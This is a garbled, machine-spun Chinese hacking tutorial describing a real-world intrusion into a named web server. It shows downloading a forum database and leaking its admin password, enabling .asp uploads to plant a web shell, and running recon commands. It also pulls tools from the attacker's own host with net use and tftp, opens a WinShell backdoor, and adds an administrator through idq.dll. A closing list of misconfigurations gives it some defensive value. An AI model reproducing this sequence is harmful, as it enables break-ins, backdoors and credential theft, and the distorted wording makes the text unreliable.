利用网站错误配置获得完全控制

  实如今网上安全站点和学黑的站点太多了,参与进来的人
  也越来越多,这些促使了很多网站和小我私家加强安全认识,是件大好事.
  所以诸如ipc$弱口令,printer,IDQ远程溢出,UNICODE,3389输出法等毛病
  曾经相比之下少了很多.这里我们来聊聊怎样不用以上的毛病,
  来入侵一台主机,加深一下对安全的明确.
  某站点IP 61.61.13.13
  开始:扫描端口,发明开放:80,135,139,1025
  尝试获取IIS信息:
  c:\tools>telnet 61.61.13.13 80
  HTTP/1.1 400 Bad Request
  Server: Microsoft-IIS/5.0
  Date: Thu, 03 Jan 2002 19:26:59 GMT
  Content-Type: text/html
  Content-Length: 87
  The parameter is incorrect.
  遗失对主机的毗连。
  C:\tools>
  //是IIS5,综合以上信息基本判定为win2000服务器
  尝试获取用户列表:
  C:\tools>letmein \\61.61.13.13 -all -d
  stating connecting to server ......
  //失败!
  尝试扫描iis cgi毛病
  略.
  //做了安全配置,没有发明可使用之毛病
  接着开始浏览该站主页,
  主页http://61.61.13.13/index.htm
  该网站很简单,主页采用html,没有使用ASP
  论坛http://61.61.13.13/bbs/default.asp
  发明该站点有一ASP论坛,论坛为高兴论坛体系(以下均隐去真名)功效较多,共享步伐
  猜:综合端口扫描结果阐发,此论坛应为ASP+ACCESS构建,因为在端口
  扫描中没有发明诸如1433 3306等端口.(当然不是相对的)
  如今我们要从论坛入手了.
  怎样入手呢?
  可能有些同道马上就会开始测试%81,Translate:f.....
  或猜文件名下载数据库,
  但我觉得在不了解前就先不要盲目标碰.
  如今开始在网上找这个论坛的步伐下载
  靠,很多多少中央都没有,
  再搜...半小时后找到并下载.
  呵呵~公然是用access
  在本身的呆板上装好此论坛,好好研究一下
  发明:数据库名是fuck.mdb,在/data下,呵呵~
  论坛有上传功效,必要设置,管理员登岸步伐是poweruser_in.asp
  差未几了,可以看看运气怎样了.
  http://61.61.13.13/bbs/data/fuck.mdb
  晕倒!竟然没改,可以下载,
  4M多,一会就完了,拿access2000或myadmin.asp打开数据库
  顺遂拿到论坛管理帐号:play/1314520
  再看看运气,会不会论坛帐户密码和体系的一样:
  net use \\61.61.13.13\ipc$ "1314520" /user:"play"
  net use \\61.61.13.13\ipc$ "1314520" /user:"administrator"
  //运气不好,都失败.
  如今登岸论坛管理页,输出用户名及密码登岸论坛管理,
  纯熟的找到上传设置(为什么会纯熟呢?因为曾经了解)
  将容许上传的文件范例中加上.asp
  晓得要干什么了吧?对,上传个ASP小步伐(在浏览器中得到一个命令条,输出命令后在浏览器中前往结果)
  上传cmd.asp到/upload下,好快,才1K多点,
  好喽~~,把刚才容许上传的文件范例中的.ASP再删掉,接着退出.
  在浏览器中:
  http://61.61.13.13/bbs/upload/cmd.asp
  出来了,呵呵~,收集点信息先:
  dir c:\ d:\ e:\
  net user
  net start
  net view
  netstat -an
  arp -a
  ...... //呵呵~~了解的差未几了
  对了,试试at命令:
  AT
  拒绝拜访。
  倒,权限着实小的不幸啊!如今是必要提拔权限了,
  那就要上传文件,又到论坛里传???不用了,
  虽然权限小,但还是有两种快捷的方法上传文件
  1. net use \\myIP\c$ "mypass" /user:"myname"
  2. tftp -i myIP get filename
  明确了吧?我选第一种方法上传文件
  先建立毗连: net use \\myIP\c$ "mypass" /user:"myname" 命令乐成完成
  如今是不克不及直接copy文件到当前目次的,
  因为当前默许路径是\winnt\system32,我们的权限小,这个目次我们是没有权限写的.
  (具体中,你可以使用cacls命令检察对文件的权限)
  那就建个目次先吧,建到d:\downloads下吧,谁人目次我们有权限写:
  md d:\downloads\winzip32 //呵呵~这名字不错.
  先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.
  copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件
  启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停很久,
  不用等的,步伐曾经启动了,点停止,接着,
  断开共享毗连: net use \\myIP\c$ /del 完成
  脱离浏览器,打开命令行窗口
  telnet 61.61.13.13 5277
  WinShell v2.0 by janker@peckerland.com - '!' to end, 'Enter' to shell...
  * d:\downloads\winzip32\winshell.exe
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) 版权所有 1985-1998 Microsoft Corp.
  c:\winnt\system32>
  //乐成得到一个shell
  我们如今的权限很小,很多目次都不克不及拜访或写,所以我们要想办法进步权限,
  (小我私家以为如果是FAT32分区的话,可能会好办些,但NTFS,太麻烦)
  这一步比较难,我试了很多方法都不乐成.
  好比:
  使用netdde.exe pipeupadmin.exe 不可
  上传了冰河6.0J,可以毗连,但权限仍然很小
  并且你的木马和后门步伐在对方重起后就不克不及用了
  缘故原由可能是权限小,无法创建服务或修改注册表,来完成开机主动启动.
  在试验中,唯一觉得可行的是如许:(我运气!!!现实中我很少乐成)
  1.上传idq.dll到对方WEB目次里的可实行目次
  2.用ispc 61.6.13.13/XXXX/idq.dll 毗连上,得到system权限
  3.或独自运转idq.dll,获得一个管理员组的用户"iisuser" 密码:"abcd1234"
  http://61.61.13.13/XXXX/idq.dll
  There will add a Administrators User "iisuser",Its Password is "abcd1234".If you want to enter cmd.exe shell,please use ispc.exe.
  但如许一样存在问题,这个可实行的目次必须是"剧本和可实行步伐"的配置
  单单是"纯剧本"不可的.
  不晓得谁另有更好的乐成办法和思路.
  以上不难看出管理员的配置错误:
  1.安置BBS后对数据库文件没有更改文件名或后缀
  2.没有禁止或更改对FileSystemObject工具的挪用
  3.WEB目次没有禁止对"everyone"的完全控制
  4.对没有必要使用的WEB目次使用了"剧本和可实行步伐"的配置
  可喜的是犯这些错误的人是越来越少了!如许也促使我们可以学习新的入侵方法.
  小我私家明确,难免有错,请您指正.
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：